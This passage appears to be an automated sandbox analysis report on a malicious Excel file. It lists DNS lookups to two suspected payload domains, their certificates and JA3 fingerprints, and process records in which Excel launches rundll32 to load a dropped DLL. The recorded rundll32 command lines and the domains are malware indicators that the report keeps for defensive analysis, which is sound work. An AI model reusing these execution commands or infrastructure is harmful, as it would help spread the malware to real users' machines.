                                                                                                                                                                                                          May 12, 2021 21:01:07.060061932 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:08.427846909 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:08.479468107 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:13.068101883 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:13.127795935 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:27.020227909 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:27.086642981 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:30.138936996 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:30.197726965 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:02:08.731451035 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:02:08.788840055 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:02:12.165663958 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:02:12.231364965 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:02:38.977041960 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:02:39.044488907 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:02:45.849172115 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:02:45.922734976 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:02:52.197717905 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:02:52.267795086 CEST53606338.8.8.8192.168.2.3

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                          May 12, 2021 21:00:51.643449068 CEST192.168.2.38.8.8.80xe34fStandard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          May 12, 2021 21:00:52.611515999 CEST192.168.2.38.8.8.80xfa45Standard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                          May 12, 2021 21:00:51.702374935 CEST8.8.8.8192.168.2.30xe34fNo error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                                                                          May 12, 2021 21:00:52.660383940 CEST8.8.8.8192.168.2.30xfa45No error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                                                                                                                                                          HTTPS Packets

                                                                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                          May 12, 2021 21:00:52.031481028 CEST192.185.39.58443192.168.2.349707CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                                          May 12, 2021 21:00:52.993200064 CEST192.185.32.232443192.168.2.349709CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:21:00:44
                                                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                          Imagebase:0x11f0000
                                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:21:00:53
                                                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                                                                          Imagebase:0xc80000
                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:21:00:53
                                                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                                                                          Imagebase:0xc80000
                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                                          Reset < >